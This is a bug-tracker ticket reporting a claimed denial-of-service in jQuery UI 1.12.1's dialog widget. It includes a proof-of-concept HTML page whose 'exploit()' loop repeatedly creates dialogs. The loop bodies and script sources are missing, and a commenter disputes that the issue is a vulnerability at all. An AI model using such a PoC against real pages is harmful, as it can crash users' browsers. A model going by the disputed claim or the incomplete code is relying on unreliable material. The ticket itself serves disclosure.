Opened 2 years ago

Last modified 2 years ago

#15390 new bug

Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog

Reported by: Rafael Cintra Lopes Owned by:
Priority: major Milestone: none
Component: ui.dialog Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:


When we inject the "dialog" for any HTML tag, more than once, the browser and the application crashes, closing the application.


for (var i = 0; i < 10; i++) {


Create an HTML file with the following code or insert the Payload above in a vulnerable environment:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
    <h2>DoS - jQuery UI 1.12.1</h2>

        <button onclick="exploit()">Exploit</button>

    <p>PoC by Rafael Cintra Lopes</p>

    <script src="" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

        function exploit(){
            for (var i = 0; i < 10; i++) {

Change History (3)

comment:1 Changed 2 years ago by Rafael Cintra Lopes

Priority: minormajor

comment:2 Changed 2 years ago by adriaon

Is work being done on this one? Cheers.

Last edited 2 years ago by adriaon (previous) (diff)

comment:3 Changed 2 years ago by Konrad Borowski

Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.

Last edited 2 years ago by Konrad Borowski (previous) (diff)
Note: See TracTickets for help on using tickets.